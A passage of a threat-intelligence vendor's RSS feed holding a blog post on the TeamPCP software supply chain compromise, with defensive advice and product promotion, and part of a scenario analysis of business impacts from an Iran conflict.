          <li><strong><a href="https://www.recordedfuture.com/ko/products/payment-fraud-intelligence">Payment Fraud Intelligence</a></strong> — tracks the complete fraud lifecycle: for check fraud, it uses OCR to extract payee, amount, and date from compromised checks being sold in forums, enabling deposit screening against known stolen checks; for card fraud, it monitors compromised merchants, stolen cards on criminal marketplaces, and the tester merchants fraudsters use to validate cards before striking.</li>
          <li><strong><a href="https://www.recordedfuture.com/ko/use-case/digital-risk">Digital Risk Protection</a></strong> — provides continuous monitoring across millions of sources for malicious sites, brand and executive impersonation, data leakage, and dark web mentions — with risk-based alerting that surfaces only actionable threats and takedown workflows built directly into the Platform.</li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_14faf4dcce5eb66f5d88bbbe34166aa2b8a612f07.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Your Supply Chain Breach Is Someone Else's Payday]]></title>
            <link>https://www.recordedfuture.com/ko/blog/your-supply-chain-breach-is-someone-else-payday</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/your-supply-chain-breach-is-someone-else-payday</guid>
            <pubDate>Wed, 15 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[A supply chain attack by TeamPCP compromised trusted software tools to harvest credentials at scale, enabling payroll fraud, logistics theft, and ransomware extortion.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <ul>
                <li>TeamPCP exploited a single stolen credential to gain write access to trusted software repositories, inject credential-harvesting malware, and cascade across five ecosystems in five days.</li>
                <li>Stolen credentials can enable payroll redirection, freight rerouting, and extortion — active campaigns Insikt Group is tracking that show how a software supply chain breach can quickly become a business operations crisis.</li>
                <li>Learn why an inventory of your software components isn't enough when malicious code is injected after the source commit, and what a truly effective defense, combining third-party due diligence, cryptographic signing, and AI-driven anomaly detection, actually requires.</li>
              </ul>
            </div>
          </div>
        </div>
        <p>In March 2026, a group calling itself TeamPCP compromised LiteLLM (a Python package with roughly <a href="https://pypistats.org/packages/litellm">97 million monthly downloads</a>, used by thousands of organizations to connect to AI services) and <a href="https://checkmarx.com/blog/checkmarx-security-update/">Checkmarx</a> (one of the most widely used application security testing platforms). How they got in isn’t publicly confirmed. But the result was write access to a trusted software repository.</p>
        <p>From there, they injected a credential-harvesting payload into the software and <a href="https://thehackernews.com/2026/03/teampcp-hacks-checkmarx-github-actions.html">poisoned two Checkmarx GitHub Actions workflows</a>. The malware ran silently on installation, vacuuming up access keys, cloud credentials, secrets, and (the cruelest irony) every AI API key that LiteLLM was specifically designed to manage. The stolen data was encrypted, then pushed to a lookalike domain.</p>
        <p>And here is the part that should keep you up at night: this was one campaign, by one group, in one week. The downstream consequences are still unfolding.</p>
        <h2>Identity Is the Perimeter (and the Attack Surface)</h2>
        <p>The throughline in the TeamPCP campaign is identity. Start to finish.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_18861a03755acfcc02c8296c0299017c1ca7c333b.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1180" />
            </div>
          </div>
          <div>
            <div>TeamPCP intelligence summary courtesy of Recorded Future.</div>
          </div>
        </div>
        <p>No one has publicly confirmed exactly how TeamPCP gained access to the LiteLLM maintainer’s repository, but the most likely vector is stolen credentials. Recorded Future’s <a href="https://www.recordedfuture.com/ko/products/identity-intelligence">identity intelligence</a> contains almost 1 million compromised GitHub developer credentials harvested by infostealers and sold across dark web marketplaces. A single publishing token or access key, lifted from a prior infection and left unrotated, would have been sufficient. TeamPCP’s earlier compromise of <a href="https://www.aquasec.com/blog/trivy-supply-chain-attack-what-you-need-to-know/?utm_source=substack&amp;utm_medium=email">Aqua Security’s Trivy</a> infrastructure in late February (where <a href="https://www.wiz.io/blog/trivy-compromised-teampcp-supply-chain-attack?utm_source=substack&amp;utm_medium=email">incomplete credential rotation</a> left residual access open for weeks) demonstrates exactly this pattern: one stolen token, one missed rotation, and the door stays open.</p>
        <p>Whatever the precise mechanism, TeamPCP used valid credentials to push malicious code into trusted repositories. No firewall to bypass. No endpoint to exploit. Just a valid login and the implicit trust that comes with it.</p>
        <p>Then the payload itself was designed to steal more identities. Each compromised environment yielded credentials that unlocked the next target. Trivy led to GitHub Actions. GitHub Actions led to <a href="https://www.securityweek.com/from-trivy-to-broad-oss-compromise-teampcp-hits-docker-hub-vs-code-pypi/?utm_source=substack&amp;utm_medium=email">four additional software distribution ecosystems</a>. One incomplete incident response created a cascading chain of supply chain compromises across five ecosystems in five days.</p>
        <p>This is the identity and access management problem stated as plainly as possible: if the perimeter is identity, then every stolen credential is a breach in the wall. And unlike a firewall rule, a stolen credential doesn’t trigger an alert. It just works.</p>
        <p>We <a href="https://intelligence2risk.substack.com/p/the-bug-that-wont-die-10-years-of?utm_source=substack&amp;utm_medium=email">previously wrote</a> about how deserialization vulnerabilities have plagued enterprise software for over a decade. The pattern is always the same: trusting input that should not be trusted. Supply chain attacks are the organizational equivalent. We trust the packages we install. We trust the pipelines we build. We trust the security tools we deploy. TeamPCP exploited every layer of that trust, starting with a single compromised identity.</p>
        <h2>The Impact Is Not Just Ransomware</h2>
        <p>TeamPCP’s <a href="https://socradar.io/blog/teampcp-checkmarx-github-actions-attack/?utm_source=substack&amp;utm_medium=email">Telegram channel references a ransomware victim’s site</a>. The group appears to operate as a ransomware affiliate and has publicly discussed extorting companies by threatening to release over 300 GB of stolen data. Reports indicate a possible collaboration with the Lapsus$ extortion group. Ransomware is the obvious play.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_17e32149dd47f3a6051343744918be53349840a08.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1100" height="794" />
            </div>
          </div>
          <div>
            <div>CipherForce intelligence summary courtesy of Recorded Future.</div>
          </div>
        </div>
        <p>But ransomware is only the most visible impact. The more dangerous question is: what else can you do with over a million stolen cloud credentials, API keys, and service account tokens?</p>
        <p>The answer, based on what <a href="https://www.recordedfuture.com/ko/research/insikt-group?utm_source=substack&amp;utm_medium=email">Insikt Group</a> is tracking across multiple unrelated campaigns, is far broader than encryption and extortion.</p>
        <p>Redirect payroll. Late last year (2025), Insikt Group was monitoring activity around a campaign called “Swiper,” run by likely Russian-speaking actors who set up phishing infrastructure impersonating major financial institutions and payroll service providers. Stolen credentials were transmitted in real time, enabling the actors to alter direct deposit accounts and redirect payments before anyone noticed. The responsible actor was identified through a dispute on a <a href="https://www.recordedfuture.com/ko/research?utm_source=substack&amp;utm_medium=email&amp;page=1">criminal forum</a>, and their cryptocurrency wallet has processed over 7,000 transactions. This was a credential theft operation that converted identity compromise directly into financial theft. Now imagine that same playbook amplified by a supply chain attack that harvests payroll platform credentials at scale.</p>
        <p>Reroute shipments. Separately, Insikt Group has identified TAG-160, a threat group targeting the US logistics and transportation sector. TAG-160 impersonates logistics companies, sends fraudulent rate confirmations via phishing emails, and delivers remote access malware. But TAG-160 has also been caught running “double brokering scams,” where they pose as a legitimate carrier, obtain valid load details from a real broker, then re-advertise the load under the broker’s name to contract a different carrier. The legitimate carrier moves the freight. The threat actor collects the payment. The real carrier never gets paid. A second, unrelated threat cluster targets German logistics companies with a similar playbook.</p>
        <p>These are not theoretical scenarios. They are active campaigns running in parallel with the TeamPCP supply chain compromises. And the common denominator across all of them is credential theft and identity abuse.</p>
        <p>In the <a href="https://intelligence2risk.substack.com/p/five-risk-categories?utm_source=substack&amp;utm_medium=email">five risk impact categories</a> we use as a framework for translating cyber threats into business risk, the TeamPCP compromise touches every single one: operational disruption (ransomware, system lockout), financial fraud (payroll redirection, double brokering fraud, extortion payments), competitive disadvantage (credentials, trade secrets, PII), brand impairment (customers learning their security tooling was the vector), and legal and compliance consequences (breach notification obligations, potential liability for downstream impacts).</p>
        <p>The tendency is to categorize supply chain attacks as a “security tool problem” or a “developer problem.” It is neither. It is a business risk problem whose blast radius extends from IT operations to payroll to logistics to the boardroom.</p>
        <p>Organizations should ask how they can use AI-driven analysis to continuously verify the integrity of every package and build artifact entering their production systems. This means comparing distributed packages against their source repositories to detect injected code. It means analyzing updates to flag anomalous changes in behavior. It means automated provenance verification that traces software from source to distribution, flagging breaks in the chain.</p>
        <p>But the TeamPCP campaign exposed a truth the industry has been slow to internalize: the security tools themselves are targets. TeamPCP specifically chose a vulnerability scanner and an application security platform because those tools have the broadest access to credentials and infrastructure. Compromising the tool that checks your code is the ultimate fox-in-the-henhouse scenario.</p>
        <p>The organizations that weather this era of supply chain risk will be those that treat code integrity verification as a continuous, automated, AI-augmented process rather than a periodic audit.</p>
        <h2>So What. Now What.</h2>
        <p>TeamPCP is not done. Their Telegram channel explicitly states the operation is still unfolding, and they claim to be working with new partners to monetize stolen data at scale.</p>
        <p>For security leaders, the immediate actions are straightforward: if your organization uses LiteLLM, Trivy, or Checkmarx GitHub Actions, assume compromise and rotate every credential on affected systems. Audit your software pipelines for unauthorized changes. Pin software dependencies to verified, <a href="https://www.microsoft.com/en-us/security/blog/2026/03/24/detecting-investigating-defending-against-trivy-supply-chain-compromise/?utm_source=substack&amp;utm_medium=email">immutable versions</a>.</p>
        <p>But the longer-term lesson is more fundamental. Supply chain attacks convert the trust model of modern software development into an attack surface. The packages you install, the tools you run, the pipelines you build: these are not neutral infrastructure. They are vectors. And the credential stolen today from a compromised software package could show up tomorrow as a payroll redirect, a rerouted shipment, or a ransomware demand.</p>
        <p>The keys to your kingdom are scattered across every package manager, every automation token, and every service account in your environment. Someone is collecting them. And your supply chain breach is already someone else’s payday.</p>
        <h2>How Recorded Future Helps</h2>
        <p>The TeamPCP campaign left signals at every stage. Three Recorded Future capabilities speak directly to this threat:</p>
        <ul>
          <li><a href="https://www.recordedfuture.com/ko/products/identity-intelligence">Identity Intelligence</a> — monitors infostealer logs, dark web markets, and credential dumps in real time, automatically detecting compromised employee credentials and triggering immediate response — including the nearly one million compromised GitHub developer credentials already in Recorded Future's dataset.</li>
          <li><a href="https://www.recordedfuture.com/ko/research/insikt-group">Insikt Group</a> — elite analysts with deep government, law enforcement, and intelligence agency experience <a href="https://www.recordedfuture.com/ko/research/insikt-group"></a>who produced the TeamPCP, Swiper, TAG-160, and CipherForce research in this blog. Customers see threats as they develop, not after they've made headlines.</li>
          <li><a href="https://www.recordedfuture.com/ko/products/third-party-intelligence">Third-Party Risk</a> — continuously monitors vendors for ransomware extortion activity, breach indicators, and credential leaks, replacing point-in-time questionnaires with real-time visibility across your supply chain.</li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1d6aff1dc009c244e9b6f66a1f1fe7bd44e4b681f.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Iran War: Future Scenario and Business Implications]]></title>
            <link>https://www.recordedfuture.com/ko/research/iran-war-future-scenarios</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/iran-war-future-scenarios</guid>
            <pubDate>Tue, 14 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Iran War: Future Scenarios and Business Implications]]></description>
            <content:encoded><![CDATA[
        <p>The Iran situation remains volatile and uncertain, with material impacts for organizations.</p>
        <p>Leaders should plan for multiple future scenarios, prioritizing resilience and effective decision-making.</p>
        <p><strong>Current State (April 10)</strong></p>
        <ul>
          <li><strong>Severe tensions persist despite a two-week ceasefire:</strong><br />The agreement remains fragile and conditional on reopening the Strait of Hormuz; each side has already accused the other of violations.</li>
          <li><strong>Maritime flows partially resume but remain uncertain:</strong><br />Disruptions and elevated security risks persist. President Trump has signaled readiness to resume strikes on Iranian infrastructure if ceasefire conditions are not met.</li>
          <li><strong>Economic conditions remain unstable:</strong><br />Energy markets remain volatile, with continued pressure on supply chains. Shipping, insurance, and aviation activity are only partially restored. Inside Iran, infrastructure damage is driving power shortages and industrial disruption.</li>
          <li><strong>Cyber activity has intensified:</strong><br />Operations targeting energy and critical infrastructure are increasing, reinforcing systemic risk across key sectors.</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1b1f2acb431306cd4d209bbb5f95b0224fc15fc9f.png?width=750&amp;format=png&amp;optimize=medium" width="398" height="561" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong> An explosion in Tehran, February 28, 2026 (Source: <a href="https://www.pbs.org/newshour/world/what-to-know-about-the-u-s-israel-attacks-on-iran">PBS</a>)</em></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1b020e8bcace97f79eda497ff78080fa22a246e06.png?width=750&amp;format=png&amp;optimize=medium" width="892" height="379" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong> Cone of Plausibility Overview: Iran Conflict (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Framework Overview</h2>
        <p>To assess how the Iran conflict could evolve over the next 6–12 months, Insikt Group analyzed regional and global dynamics using the <strong>PESTLE-M</strong> framework, covering <strong>Political, Economic, Social, Technological, Legal, Environmental,</strong> and <strong>Military</strong> domains, with a focus on Iran, the United States, Israel, and Gulf States.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_159b6d509a3a6f5a3d3b9155d4c282f74fa366642.png?width=750&amp;format=png&amp;optimize=medium" width="892" height="149" />
            </div>
          </div>
          <div>
            <div>Figure 3: PESTLE-M Framework (Source: Recorded Future)</div>
          </div>
        </div>
        <p>This analysis informed a scenario generation exercise using a <strong>Cone of Plausibility (CoP)</strong> method. The objective was not to predict a single outcome, but to explore a range of <strong>alternative futures</strong> based on observed signals and emerging trends.</p>
        <div>
          <div>
            <div>
              <p><strong>Cone bands (outer to inner):</strong> Wildcard, Plausible, Baseline, Plausible</p>
              <p>
                <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1123745b4ba7dc967aa307abce4f0cb1bdcc7631a.png?width=750&amp;format=png&amp;optimize=medium" width="560" height="381" />
              </p>
            </div>
          </div>
          <div>
            <div>Figure 4: Cone of Plausibility Framework (Source: Recorded Future)</div>
          </div>
        </div>
        <h2>Methodology</h2>
        <p>For each <strong>PESTLE-M</strong> category, we identified key <strong>drivers</strong> that could increase or decrease the likelihood of escalation, de-escalation, or sustained instability, and assessed how these dynamics may evolve under different <strong>assumptions</strong>. These were combined to develop <strong>six scenarios</strong>: one <strong>baseline</strong>, two <strong>plausible</strong> (best and worst case), and three <strong>wildcard</strong> scenarios, enabling organizations to evaluate how the conflict may unfold and the potential impacts on their operating environment.</p>
        <p>Within the CoP framework:</p>
        <ul>
          <li><strong>Drivers</strong> are signals and trends that could shape future developments</li>
          <li><strong>Assumptions</strong> reflect how those drivers may evolve over time</li>
          <li><strong>Scenarios</strong> describe how these dynamics could combine to produce distinct future states</li>
        </ul>
        <p>We define scenarios as follows:</p>
        <ul>
          <li><strong>Baseline:</strong> A forward projection of current trends and conditions</li>
          <li><strong>Plausible:</strong> A realistic alternative outcome based on evolving drivers and assumptions</li>
          <li><strong>Wildcard:</strong> A low-probability, high-impact scenario that challenges existing assumptions</li>
        </ul>
        <h2>Baseline Scenario: Fragile Ceasefire with Sustained Economic Disruption</h2>
        <p>Key Drivers <strong>and Assumptions</strong></p>
        <ul>
          <li>Conditional ceasefire <strong>→ Underlying conflict causes unaddressed</strong></li>
          <li>Maritime coercion <strong>→ Economic warfare persists</strong></li>
          <li>Infrastructure targeting <strong>→ Energy disruption continues</strong></li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1915b1bdbe852f19651fd2a87f32416d9ec8cebcd.png?width=750&amp;format=png&amp;optimize=medium" width="512" height="368" />
            </div>
          </div>
          <div>
            <div>Figure 5: Brent oil prices and projections (Source: <a href="https://www.oxfordeconomics.com/resource/prolonged-war-in-iran-could-tip-the-global-economy-into-recession/">Oxford Economics</a>)</div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_124435e23803004755d4ea76bd411aa2046ba5a20.png?width=750&amp;format=png&amp;optimize=medium" width="1280" height="720" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 6:</strong> Iran is also threatening maritime traffic through the Bab al-Mandab, another key route (Source: <a href="https://timesofindia.indiatimes.com/defence/iran-parliament-planning-to-target-bab-el-mandeb-why-this-red-seagulf-of-aden-strait-matters-india-trade-chokepoint/articleshow/130017334.cms">Times of India</a>)</em></div>
          </div>
        </div>
        <h2>Baseline: A forward projection of current trends and conditions</h2>
        <p><strong>Ceasefire holds, but conflict shifts into sustained economic warfare.</strong></p>
        <p>A fragile ceasefire reduces the pace of direct military exchanges, but the drivers of conflict remain unresolved. Iran lacks the capacity for decisive escalation but retains asymmetric leverage, while the US prioritizes energy market stability and conflict containment. The Strait of Hormuz reopens only intermittently, with recurring disruptions, inspections, and security incidents, keeping shipping, insurance, and energy markets under sustained pressure. Gulf financial, logistics, and technology sectors operate intermittently, airlines maintain some route suspensions, and cyber activity remains elevated against regional infrastructure and Western-linked organizations. The conflict evolves into economic coercion as a primary tool, driving elevated oil and gas prices, persistent market volatility, and tighter financing conditions. Supply chains gradually reconfigure away from high-risk routes, increasing costs and reducing efficiency. Russia benefits from sustained high energy prices and reduced Western focus, strengthening its position in Ukraine. China capitalizes on fragmentation by expanding alternative trade and financial networks, reinforcing a more bifurcated global system.</p>
        <h3>Likelihood</h3>
        <p><strong>Most likely if ceasefire holds without resolution:</strong> Conflict remains below full-scale war, but economic disruption persists as the dominant mode of competition.</p>
        <div>
          <div>
            <div><strong>Business Implications</strong></div>
            <div><strong>Priority Actions (0-90 days)</strong></div>
          </div>
          <div>
            <div><strong>Operational:</strong> Intermittent shipping, route, and supplier disruption increases cost and complexity</div>
            <div>Stress-test <strong>exposure to Hormuz-related</strong> shipping and energy disruption</div>
          </div>
          <div>
            <div><strong>Financial:</strong> Elevated energy prices and volatility sustain margin pressure and tighter financing</div>
            <div>Harden resilience for <strong>energy, logistics, and cyber-dependent</strong> operations</div>
          </div>
          <div>
            <div><strong>Competitive:</strong> Firms with diversified routing and lower energy exposure gain advantage</div>
            <div>Review <strong>sanctions, insurance, and counterparty risk</strong> across key jurisdictions</div>
          </div>
          <div>
            <div><strong>Legal:</strong> Evolving sanctions and emergency measures raise compliance burden and enforcement risk</div>
            <div></div>
          </div>
          <div>
            <div><strong>Reputational:</strong> Scrutiny over pricing, shortages, and regional exposure increases brand risk</div>
            <div></div>
          </div>
        </div>
        <h2>Plausible Scenario (Best Case): Managed Stalemate</h2>
        <p>Key Drivers <strong>and Assumptions</strong></p>
        <ul>
          <li>US threats and military strikes fail to coerce Iran into concession <strong>→ Limited appetite for sustained conflict</strong></li>
          <li>Significant economic disruption <strong>→ Economic costs drive political decisions</strong></li>
          <li>US military footprint in region <strong>→ Potential for re-escalation</strong></li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_18d51aeb2def07a958821fbcdbd793d73232787f4.png?width=750&amp;format=png&amp;optimize=medium" width="569" height="356" />
            </div>
          </div>
          <div>
            <div>Figure 7: US President Trump delivers a warning to Iran at a White House Easter event (Source: <a href="https://www.pbs.org/newshour/politics/watch-live-trumps-hold-white-house-easter-egg-roll-as-iran-war-escalates">PBS News</a>)</div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_107d6e3aa00de195130d129c6ba9a979c794548f9.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="900" />
            </div>
          </div>
          <div>
            <div>Figure 8: Iran has used maritime traffic through the Strait of Hormuz as leverage in the conflict (Source: <a href="https://www.cnbc.com/2026/03/02/strait-of-hormuz-crisis-us-iran-israel-war-shipping-trade-oil.html">CNBC</a>)</div>
          </div>
        </div>
        <h2><strong>Plausible:</strong> A realistic alternative outcome based on evolving drivers and assumptions</h2>
        <p><strong>The US portrays its leadership decapitation campaign as successfully facilitating “regime change,” creating space for diplomatic engagement with “new” leadership. Iran maintains an increased level of oversight over the Strait of Hormuz, while internally the IRGC plays a greater role in strategic decision-making.</strong></p>
        <p>Domestic economic and political pressure leads the US to scale back military operations without clear resolution of key regional security issues, including Iran’s right to nuclear enrichment, its ballistic missile program, and its support for regional proxies. Maritime traffic slowly returns to pre-war levels, with a new protocol for vessel traffic under an internationally accepted mandate. Iran retains an increased level of oversight over the Strait of Hormuz passages and profits from the traffic. This relieves some economic strain, though lingering supply chain effects remain. Cyber attacks persist as a means of asymmetric coercion. The US lifts some sanctions against the “new” regime, but other sanctions remain in place, complicating the regulatory environment. Interest in renewable energy increases as companies seek to mitigate against future disruption, though oil demand returns to pre-conflict norms. Israel continues limited, highly targeted strikes, while the US retains its military presence in the region, keeping the possibility for re-escalation open.</p>
        <h3>Likelihood</h3>
        <p><strong>Less likely as conflict continues:</strong> This scenario assumes the US’s limited appetite for full-scale war, but the opportunities for de-escalation diminish as the conflict persists.</p>
        <div>
          <div>
            <div><strong>Business Implications</strong></div>
            <div><strong>Priority Actions (0-90 days)</strong></div>
          </div>
          <div>
            <div><strong>Operational:</strong> Recurring disruption risk for regional transport corridors, ports, and cross-border trade</div>
            <div>Keep <strong>sanctions, export-control, and third-party due diligence</strong> on heightened alert</div>
          </div>
          <div>
            <div><strong>Financial:</strong> Long-term effects of recovery</div>
            <div>Build <strong>redundancy</strong> into critical suppliers</div>
          </div>
          <div>
            <div><strong>Competitive:</strong> Competitors with diversified sourcing, redundancy, and mature sanctions controls are best positioned to withstand ongoing shocks</div>
            <div>Maintain an <strong>elevated cyber posture</strong></div>
          </div>
          <div>
            <div><strong>Legal:</strong> Continued tensions mean sanctions and export controls may tighten again with little notice</div>
            <div>Tighten <strong>executive decision rights</strong> and trigger points for regional exposure</div>
          </div>
          <div>
            <div><strong>Reputational:</strong> Price increases tied to lingering supply-chain effects may trigger accusations of profiteering</div>
            <div><strong>Accelerate resilience investments</strong> with strategic upside, especially energy efficiency, renewable sourcing, and inventory visibility</div>
          </div>
        </div>
        <h2>Plausible Scenario (Worst Case): Regional Conflict with Gulf Involvement</h2>
        <p>Key Drivers <strong>and Assumptions</strong></p>
        <ul>
          <li>Conditional ceasefire <strong>→ Continuing provocation re-escalates conflict</strong></li>
          <li>Strait of Hormuz chokehold effective <strong>→ Asymmetric advantage to disruption</strong></li>
          <li>Gulf infrastructure targeted <strong>→ Multi-state escalation</strong></li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1b38ced8d30b196363e863e8fd1e1885036e97ded.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1066" />
            </div>
          </div>
          <div>
            <div><strong>Figure 9:</strong> The Saudi crown prince reportedly urged President Trump to continue war (Source: <a href="https://www.nytimes.com/2026/03/24/us/politics/saudi-prince-iran-trump.html">NYT</a>)</div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1c1b0a0987467003970eb1d67ec3764b0d7f291ad.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1029" />
            </div>
          </div>
          <div>
            <div><strong>Figure 10:</strong> The UAE has been proactive in the conflict, taking nonmilitary measures against Iran (Source: <a href="https://www.scmp.com/week-asia/economics/article/3348996/uae-squeezes-iranian-economic-lifeline-retaliation-attacks">South China Morning Post</a>)</div>
          </div>
        </div>
        <h2><strong>Plausible:</strong> A realistic alternative outcome based on evolving drivers and assumptions</h2>
        <p><strong>Ceasefire collapses, triggering multi-state regional war.</strong></p>
        <p>A temporary ceasefire breaks down following renewed strikes and failure to secure maritime access. Iran escalates missile and proxy attacks, including targeting Gulf energy infrastructure. With critical thresholds crossed, Saudi Arabia, the UAE, and Bahrain enter the conflict directly to protect economic and political stability. The Strait of Hormuz and Bab al-Mandab become sustained conflict zones, with repeated attacks, mining, and vessel seizures. Shipping and insurance markets withdraw at scale, severely constraining global energy flows. Energy prices surge, driving inflation and recession risk globally. Fuel shortages emerge in import-dependent economies, triggering industrial slowdowns, reduced mobility, and rolling outages. Cyber operations escalate into coordinated campaigns targeting energy, logistics, and financial systems. Legal fragmentation accelerates, with overlapping sanctions regimes, asset controls, and enforcement actions constraining cross-border operations. Russia exploits elevated energy revenues and reduced Western focus to press its advantage in Ukraine. China remains indirect but leverages Western overstretch to increase pressure on Taiwan.</p>
        <h3>Likelihood</h3>
        <p><strong>More likely if ceasefire collapses and Gulf assets are targeted:</strong> Escalation becomes self-reinforcing once regional actors are drawn into direct conflict.</p>
        <div>
          <div>
            <div><strong>Business Implications</strong></div>
            <div><strong>Priority Actions (0-90 days)</strong></div>
          </div>
          <div>
            <div><strong>Operational:</strong> Supplier and production relocation, increased redundancy, and higher cost and complexity</div>
            <div><strong>Harden critical infrastructure</strong> dependencies (energy, logistics, third parties)</div>
          </div>
          <div>
            <div><strong>Financial:</strong> Energy costs and inflation drive margin pressure, while financing becomes tighter and more expensive</div>
            <div>Test <strong>business continuity under outage</strong> scenarios</div>
          </div>
          <div>
            <div><strong>Competitive:</strong> Resilient, energy-secure firms gain advantage; exposed firms lose share</div>
            <div><strong>Segment and isolate high-value systems;</strong> prioritize offline backups and rapid recovery</div>
          </div>
          <div>
            <div><strong>Legal:</strong> Fragmented, fast-changing sanctions increase compliance burden and legal risk</div>
            <div>Review <strong>third-party and regional concentration risk</strong>, particularly for Middle</div>
          </div>
          <div>
            <div><strong>Reputational:</strong> Scrutiny over pricing, shortages, and exposure drives brand and trust risk</div>
            <div>Establish <strong>crisis governance</strong> and decision cadence</div>
          </div>
        </div>
        <h2>Wildcard Scenario 1: Lasting Peace Agreement</h2>
        <p>Key Drivers <strong>and Assumptions</strong></p>
        <ul>
          <li>Severe degradation of Iranian infrastructure <strong>→ Iran compelled to concede</strong></li>
          <li>Global economic disruption <strong>→ International support for peace process</strong></li>
          <li>Sustained disruption to Hormuz and energy markets <strong>→ Mutual incentive to stabilize</strong></li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_15ce8db2bf558a0ff77b27d30d8ea263a96999b49.png?width=750&amp;format=png&amp;optimize=medium" width="1440" height="960" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 11:</strong> Pakistan has offered to host talks to broker peace between US, Iran (Source: <a href="https://time.com/article/2026/03/29/iran-war-pakistan-talks-trump/">Time</a>)</em></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1c4d4feb2a20813e86458cd2601e1220aab347bc2.png?width=750&amp;format=png&amp;optimize=medium" width="466" height="269" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 12:</strong> Traffic through the Strait of Hormuz dropped significantly since conflict began (Source: <a href="https://www.icis.com/chemicals-and-the-economy/2026/03/strait-of-hormuz-closure-starts-to-have-major-economic-impact/">Lloyd's List</a>)</em></div>
          </div>
        </div>
        <h2><strong>Wildcard:</strong> A low-probability, high-impact scenario that challenges existing assumptions</h2>
        <p><strong>Negotiated settlement reached between the US and Iran, allowing for long-term drawdown of conflict.</strong><br />Significant degradation of Iran’s energy, military, and industrial infrastructure, combined with mounting economic strain, power shortages, and reduced capacity to sustain conflict, compels Tehran to reassess its position and signal willingness to accept concessions. In parallel, the United States faces rising economic costs from prolonged energy disruption, inflation, and market instability, increasing pressure to stabilize conditions. A negotiated settlement emerges through indirect talks, mediated by Oman, with Iran accepting concessions on maritime security and nuclear constraints in exchange for phased sanctions relief and assurances against further strikes. Iran seeks a revised Strait of Hormuz security framework and limited economic concessions, though broader demands such as reparations are only partially addressed. The Strait of Hormuz fully reopens under agreed security mechanisms, restoring stable shipping and energy flows. Sanctions ease gradually, enabling reintegration of Iranian energy exports and limited foreign investment. Military activity declines sharply, cyber operations reduce, and global energy markets stabilize, easing inflationary pressures and improving financial conditions.</p>
        <h3>Likelihood</h3>
        <p><strong>Low probability:</strong> Requires significant concessions from one side under sustained pressure.</p>
        <div>
          <div>
            <div><strong>Business Implications</strong></div>
            <div><strong>Priority Actions (0-90 days)</strong></div>
          </div>
          <div>
            <div><strong>Operational:</strong> Supply chains stabilize, enabling efficiency gains and reduced redundancy</div>
            <div><strong>Monitor stabilization signals</strong> and time market re-entry strategically</div>
          </div>
          <div>
            <div><strong>Financial:</strong> Lower energy prices ease margin pressure and improve access to capital</div>
            <div>Secure <strong>long-term energy and supply contracts</strong> at favorable prices</div>
          </div>
          <div>
            <div><strong>Competitive:</strong> Early movers capture growth opportunities in recovering markets</div>
            <div><strong>Re-optimize supply chains</strong> and reduce excess redundancy</div>
          </div>
          <div>
            <div><strong>Legal:</strong> Sanctions easing reduces compliance burden and enables cross-border activity</div>
            <div><strong>Reassess sanctions</strong> exposure and compliance frameworks</div>
          </div>
          <div>
            <div><strong>Reputational:</strong> Stabilization and reinvestment strengthen stakeholder trust</div>
            <div>Align <strong>growth and investment strategy</strong> to recovering regional markets</div>
          </div>
        </div>
        <h2>Wildcard Scenario 2: Iranian Regime Collapses</h2>
        <p>Key Drivers <strong>and Assumptions</strong></p>
        <ul>
          <li>Decades of political repression <strong>-&gt; No viable alternative to Iranian regime</strong></li>
          <li>Sectarian and political unrest <strong>-&gt; Protracted internal conflict</strong></li>
          <li>Targeting of leadership <strong>-&gt; Regime instability and eventual collapse</strong></li>
        </ul>
        <div>
          <div>
            <div>
